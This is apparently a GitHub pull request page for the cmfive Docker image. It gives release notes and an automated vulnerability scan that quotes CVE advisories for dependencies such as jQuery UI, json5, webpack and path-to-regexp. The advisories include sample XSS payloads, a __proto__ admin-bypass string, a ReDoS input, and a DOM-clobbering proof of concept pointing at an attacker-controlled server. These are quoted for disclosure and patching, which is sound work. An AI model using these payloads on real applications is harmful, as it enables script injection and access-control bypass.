Release develop changes

[mattbell87]

• ARM builds

• Standardise on lowercase admin users (caused issues with tests)

• Xdebug implemented for development

• Mobile playwright, plus improvements @dragonflyfree

• Fix for core default branch name

• Health check changed to be simpler, doesn't spam xdebug

[github-actions]

Overview

Image reference	ghcr.io/2pisoftware/cmfive:develop	ghcr.io/2pisoftware/cmfive:pr-158
- digest	0fb7963e1ed5	2ba2ae55e5db
- tag	develop	pr-158
- provenance	aba4796	79de503
- vulnerabilities
- platform	linux/amd64	linux/amd64
- size	380 MB	381 MB (+394 kB)
- packages	1118	1117 (-1)
Base Image	alpine:3.19	alpine:3.19 also known as: • 3.19.4
- vulnerabilities

Labels (3 changes)

• ± 3 changed
• 6 unchanged

-org.opencontainers.image.created=2024-09-04T22:29:12.520Z
+org.opencontainers.image.created=2024-09-10T06:26:31.720Z
 org.opencontainers.image.description=Cmfive in a docker image
 org.opencontainers.image.licenses=GPL-3.0
-org.opencontainers.image.revision=aba479640416e385c744b4e77f4a18f4103a8e6a
+org.opencontainers.image.revision=79de5039d278d5587b200a36c922f6911d5452de
 org.opencontainers.image.source=https://github.com/2pisoftware/cmfive-boilerplate
 org.opencontainers.image.title=Cmfive
 org.opencontainers.image.url=https://github.com/2pisoftware/cmfive-boilerplate
 org.opencontainers.image.vendor=2pisoftware
-org.opencontainers.image.version=develop
+org.opencontainers.image.version=pr-158

Packages and Vulnerabilities (13 package changes and 4 vulnerability changes)

• ➖ 1 packages removed
• ♾️ 12 packages changed
• 1030 packages unchanged

• ✔️ 4 vulnerabilities removed

Changes for packages of type apk (5 changes)

	Package	Version ghcr.io/2pisoftware/cmfive:develop	Version ghcr.io/2pisoftware/cmfive:pr-158
♾️	expat	2.6.2-r0	2.6.3-r0
		Removed vulnerabilities (3):
♾️	libcrypto3	3.1.6-r2	3.1.7-r0
♾️	libexpat	2.6.2-r0	2.6.3-r0
♾️	libssl3	3.1.6-r2	3.1.7-r0
♾️	openssl	3.1.6-r2	3.1.7-r0
		Removed vulnerabilities (1):

Changes for packages of type composer (8 changes)

	Package	Version ghcr.io/2pisoftware/cmfive:develop	Version ghcr.io/2pisoftware/cmfive:pr-158
♾️	mtdowling/jmespath.php	2.7.0	2.8.0
♾️	symfony/polyfill-ctype	1.30.0	1.31.0
♾️	symfony/polyfill-iconv	1.30.0	1.31.0
♾️	symfony/polyfill-intl-idn	1.30.0	1.31.0
♾️	symfony/polyfill-intl-normalizer	1.30.0	1.31.0
♾️	symfony/polyfill-mbstring	1.30.0	1.31.0
➖	symfony/polyfill-php72	1.30.0
♾️	symfony/polyfill-php80	1.30.0	1.31.0

[github-actions]

🔍 Vulnerabilities of ghcr.io/2pisoftware/cmfive:pr-158

📦 Image Reference ghcr.io/2pisoftware/cmfive:pr-158

digest	sha256:2ba2ae55e5db37a5c3778d855e20e2f50961a0f407881847166d16dd88a24a5e
vulnerabilities
size	381 MB
packages	1117

📦 Base Image alpine:3.19

also known as	3.19.4
digest	sha256:f11993ab46a7e9f2d09007f8b7cbcc75e48e3691f9ae8d579fe4cb988d7b4ccd
vulnerabilities

babel-traverse 6.26.0 (npm) pkg:npm/babel-traverse@6.26.0 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Incomplete List of Disallowed Inputs Affected range <7.23.2 Fixed version Not Fixed CVSS Score 9.3 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H EPSS Score 0.06% EPSS Percentile 26th percentile Description Impact Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()or path.evaluateTruthy() internal Babel methods. Known affected plugins are: @babel/plugin-transform-runtime @babel/preset-env when using its useBuiltIns option Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator No other plugins under the @babel/ namespace are impacted, but third-party plugins might be. Users that only compile trusted code are not impacted. Patches The vulnerability has been fixed in @babel/traverse@7.23.2. Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6. Workarounds Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version. If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions: @babel/plugin-transform-runtime v7.23.2 @babel/preset-env v7.23.2 @babel/helper-define-polyfill-provider v0.4.3 babel-plugin-polyfill-corejs2 v0.4.6 babel-plugin-polyfill-corejs3 v0.8.5 babel-plugin-polyfill-es-shims v0.10.0 babel-plugin-polyfill-regenerator v0.5.3

twig/twig 3.3.10 (composer) pkg:composer/twig/twig@3.3.10 # Dockerfile (132:132) RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core' Protection Mechanism Failure Affected range >=3.0.0 <3.14.0 Fixed version 3.14.0 CVSS Score 8.5 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H Description Description Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions. The security issue happens when all these conditions are met: The sandbox is disabled globally; The sandbox is enabled via a sandboxed include() function which references a template name (like included.twig) and not a Template or TemplateWrapper instance; The included template has been loaded before the include() call but in a non-sandbox context (possible as the sandbox has been globally disabled). Resolution The patch ensures that the sandbox security checks are always run at runtime. Credits We would like to thank Fabien Potencier for reporting and fixing the issue. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=3.0.0 <3.4.3 Fixed version 3.4.3 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N EPSS Score 0.33% EPSS Percentile 71st percentile Description Description When using the filesystem loader to load templates for which the name is a user input, it is possible to use the source or include statement to read arbitrary files from outside the templates directory when using a namespace like @somewhere/../some.file (in such a case, validation is bypassed). Resolution We fixed validation for such template names. Even if the 1.x branch is not maintained anymore, a new version has been released. Credits We would like to thank Dariusz Tytko for reporting the issue and Fabien Potencier for fixing the issue.

path-to-regexp 0.1.7 (npm) pkg:npm/path-to-regexp@0.1.7 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Inefficient Regular Expression Complexity Affected range <0.1.10 Fixed version 0.1.10 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Description Impact In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Patches For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0. Version 0.1.10 adds backtracking protection when a custom regular expression is not provided, so it's still possible to manually create a ReDoS vulnerability if you are providing custom regular expressions. Version 8.0.0 removes all features that can cause a ReDoS and stops exposing the regular expression directly. Workarounds All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change /:a-:b to /:a-:b([^-/]+). If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster. Details Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For example, /:a-:b will produce the regular expression /^\/([^\/]+?)-([^\/]+?)\/?$/. This can be exploited by a path such as /a${'-a'.repeat(8_000)}/a. OWASP has a good example of why this occurs, but the TL;DR is the /a at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the :a-:b on the repeated 8,000 -a. References OWASP Detailed blog post

chart.js 2.5.0 (npm) pkg:npm/chart.js@2.5.0 # Dockerfile (132:132) RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core' Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') Affected range <2.9.4 Fixed version 2.9.4 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 1.80% EPSS Percentile 88th percentile Description This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution.

json5 0.5.1 (npm) pkg:npm/json5@0.5.1 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') Affected range <1.0.2 Fixed version 1.0.2 CVSS Score 7.1 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H EPSS Score 1.03% EPSS Percentile 84th percentile Description The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. Impact This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. Mitigation This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later. Details Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data: const JSON5 = require('json5'); const doSomethingDangerous = (props) => { if (props.isAdmin) { console.log('Doing dangerous thing as admin.'); } else { console.log('Doing dangerous thing as user.'); } }; const secCheckKeysSet = (obj, searchKeys) => { let searchKeyFound = false; Object.keys(obj).forEach((key) => { if (searchKeys.indexOf(key) > -1) { searchKeyFound = true; } }); return searchKeyFound; }; const props = JSON5.parse('{"foo": "bar"}'); if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) { doSomethingDangerous(props); // "Doing dangerous thing as user." } else { throw new Error('Forbidden...'); } If the user attempts to set the isAdmin key, their request will be rejected: const props = JSON5.parse('{"foo": "bar", "isAdmin": true}'); if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) { doSomethingDangerous(props); } else { throw new Error('Forbidden...'); // Error: Forbidden... } However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin: const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}'); if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) { doSomethingDangerous(props); // "Doing dangerous thing as admin." } else { throw new Error('Forbidden...'); }

jquery-ui 1.10.4 (npm) pkg:npm/jquery-ui@1.10.4 # Dockerfile (132:132) RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core' Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <1.13.0 Fixed version 1.13.0 CVSS Score 6.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N EPSS Score 0.45% EPSS Percentile 76th percentile Description Impact Accepting the value of the of option of the .position() util from untrusted sources may execute untrusted code. For example, invoking the following code: $( "#element" ).position( { my: "left top", at: "right bottom", of: "<img onerror='doEvilThing()' src='/404' />", collision: "none" } ); will call the doEvilThing() function. Patches The issue is fixed in jQuery UI 1.13.0. Any string value passed to the of option is now treated as a CSS selector. Workarounds A workaround is to not accept the value of the of option from untrusted sources. For more information If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <1.13.0 Fixed version 1.13.0 CVSS Score 6.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N EPSS Score 0.36% EPSS Percentile 73rd percentile Description Impact Accepting the value of various *Text options of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way: $( "#datepicker" ).datepicker( { showButtonPanel: true, showOn: "both", closeText: "<script>doEvilThing( 'closeText XSS' )</script>", currentText: "<script>doEvilThing( 'currentText XSS' )</script>", prevText: "<script>doEvilThing( 'prevText XSS' )</script>", nextText: "<script>doEvilThing( 'nextText XSS' )</script>", buttonText: "<script>doEvilThing( 'buttonText XSS' )</script>", appendText: "<script>doEvilThing( 'appendText XSS' )</script>", } ); will call doEvilThing with 6 different parameters coming from all *Text options. Patches The issue is fixed in jQuery UI 1.13.0. The values passed to various *Text options are now always treated as pure text, not HTML. Workarounds A workaround is to not accept the value of the *Text options from untrusted sources. For more information If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <1.13.0 Fixed version 1.13.0 CVSS Score 6.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N EPSS Score 0.33% EPSS Percentile 71st percentile Description Impact Accepting the value of the altField option of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way: $( "#datepicker" ).datepicker( { altField: "<img onerror='doEvilThing()' src='/404' />", } ); will call the doEvilThing function. Patches The issue is fixed in jQuery UI 1.13.0. Any string value passed to the altField option is now treated as a CSS selector. Workarounds A workaround is to not accept the value of the altField option from untrusted sources. For more information If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <1.13.2 Fixed version 1.13.2 CVSS Score 6.1 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N EPSS Score 0.22% EPSS Percentile 61st percentile Description Impact Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. If you call .checkboxradio( "refresh" ) on such a widget and the initial HTML contained encoded HTML entities, they will erroneously get decoded. This can lead to potentially executing JavaScript code. For example, starting with the following initial secure HTML: <label> <input id="test-input"> &lt;img src=x onerror="alert(1)"&gt; </label> and calling: $( "#test-input" ).checkboxradio(); $( "#test-input" ).checkboxradio( "refresh" ); will turn the initial HTML into: <label> <!-- some jQuery UI elements --> <input id="test-input"> <img src=x onerror="alert(1)"> </label> and the alert will get executed. Patches The bug has been patched in jQuery UI 1.13.2. Workarounds To remediate the issue, if you can change the initial HTML, you can wrap all the non-input contents of the label in a span: <label> <input id="test-input"> <span>&lt;img src=x onerror="alert(1)"&gt;</span> </label> References https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/ For more information If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <1.12.0 Fixed version 1.12.0 CVSS Score 6.1 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N EPSS Score 0.47% EPSS Percentile 76th percentile Description Affected versions of jquery-ui are vulnerable to a cross-site scripting vulnerability when arbitrary user input is supplied as the value of the closeText parameter in the dialog function. jQuery-UI is a library for manipulating UI elements via jQuery. Version 1.11.4 has a cross site scripting (XSS) vulnerability in the closeText parameter of the dialog function. If your application passes user input to this parameter, it may be vulnerable to XSS via this attack vector. Recommendation Upgrade to jQuery-UI 1.12.0 or later.

postcss 7.0.36 (npm) pkg:npm/postcss@7.0.36 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improper Neutralization of Line Delimiters Affected range <8.4.31 Fixed version 8.4.31 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N EPSS Score 0.06% EPSS Percentile 26th percentile Description An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule. This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.

codemirror 4.4.0 (npm) pkg:npm/codemirror@4.4.0 # Dockerfile (132:132) RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core' Uncontrolled Resource Consumption Affected range <5.58.2 Fixed version 5.58.2 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 1.71% EPSS Percentile 88th percentile Description This affects the package codemirror before 5.58.2; the package org.apache.marmotta.webjars:codemirror before 5.58.2. The vulnerable regular expression is located in https://github.com/codemirror/CodeMirror/blob/cdb228ac736369c685865b122b736cd0d397836c/mode/javascript/javascript.jsL129. The ReDOS vulnerability of the regex is mainly due to the sub-pattern (s|/.?/)

vue-template-compiler 2.7.16 (npm) pkg:npm/vue-template-compiler@2.7.16 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range >=2.0.0 <3.0.0 Fixed version 3.0.0 CVSS Score 4.2 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N EPSS Score 0.04% EPSS Percentile 10th percentile Description A vulnerability has been discovered in vue-template-compiler, that allows an attacker to perform XSS via prototype pollution. The attacker could change the prototype chain of some properties such as Object.prototype.staticClass or Object.prototype.staticStyle to execute arbitrary JavaScript code. Vue 2 has reached End-of-Life. This vulnerability has been patched in Vue 3.

postcss 7.0.39 (npm) pkg:npm/postcss@7.0.39 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improper Neutralization of Line Delimiters Affected range <8.4.31 Fixed version 8.4.31 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N EPSS Score 0.06% EPSS Percentile 26th percentile Description An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule. This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.

quill 1.3.7 (npm) pkg:npm/quill@1.3.7 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <=1.3.7 Fixed version Not Fixed CVSS Score 4.2 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N EPSS Score 0.13% EPSS Percentile 48th percentile Description A vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. No patch exists and no further releases are planned. This CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found here.

webpack 5.93.0 (npm) pkg:npm/webpack@5.93.0 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range >=5.0.0-alpha.0 <5.94.0 Fixed version 5.94.0 CVSS Score 6.4 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H EPSS Score 0.06% EPSS Percentile 26th percentile Description Summary We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code. Details Backgrounds DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references: [1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/ Gadgets found in Webpack We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files: /******/ /* webpack/runtime/publicPath */ /******/ (() => { /******/ var scriptUrl; /******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + ""; /******/ var document = __webpack_require__.g.document; /******/ if (!scriptUrl && document) { /******/ if (document.currentScript) /******/ scriptUrl = document.currentScript.src; /******/ if (!scriptUrl) { /******/ var scripts = document.getElementsByTagName("script"); /******/ if(scripts.length) { /******/ var i = scripts.length - 1; /******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src; /******/ } /******/ } /******/ } /******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration /******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic. /******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser"); /******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/"); /******/ __webpack_require__.p = scriptUrl; /******/ })(); However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks. PoC Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept. Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack: // entry.js import('./import1.js') .then(module => { module.hello(); }) .catch(err => { console.error('Failed to load module', err); }); // import1.js export function hello () { console.log('Hello'); } The webpack.config.js is set up as follows: const path = require('path'); module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development', }; When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page. <!DOCTYPE html> <html> <head> <title>Webpack Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!> </head> <script src="./dist/webpack-gadgets.bundle.js"></script> <body> </body> </html> Impact This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. Patch A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174 /******/ /* webpack/runtime/publicPath */ /******/ (() => { /******/ var scriptUrl; /******/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + ""; /******/ var document = __webpack_require__.g.document; /******/ if (!scriptUrl && document) { /******/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :> /******/ scriptUrl = document.currentScript.src; /******/ if (!scriptUrl) { /******/ var scripts = document.getElementsByTagName("script"); /******/ if(scripts.length) { /******/ var i = scripts.length - 1; /******/ while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src; /******/ } /******/ } /******/ } /******/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration /******/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic. /******/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser"); /******/ scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/"); /******/ __webpack_require__.p = scriptUrl; /******/ })(); Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.

aws/aws-sdk-php 3.224.0 (composer) pkg:composer/aws/aws-sdk-php@3.224.0 # Dockerfile (132:132) RUN su cmfive -c 'INSTALL_ENV=docker php cmfive.php install core' Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range <3.288.1 Fixed version 3.288.1 CVSS Score 6 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N EPSS Score 0.04% EPSS Percentile 16th percentile Description Impact Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in thebuildEndpoint method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The buildEndpoint method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. Versions of the AWS SDK for PHP v3 before 3.288.1 are affected by this issue. Patches Upgrade to the AWS SDK for PHP >= 3.288.1, if you are on version < 3.288.1. References RFC 3986 - https://datatracker.ietf.org/doc/html/rfc3986 For more information If you have any questions or comments about this advisory, please contact AWS's Security team.

micromatch 4.0.7 (npm) pkg:npm/micromatch@4.0.7 # Dockerfile (141:144) COPY --chown=cmfive:cmfive \ --from=core \ /cmfive-core/system/templates/base/node_modules \ system/templates/base/node_modules Inefficient Regular Expression Complexity Affected range <4.0.8 Fixed version 4.0.8 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 0.04% EPSS Percentile 16th percentile Description The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to micromatch/micromatch#266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.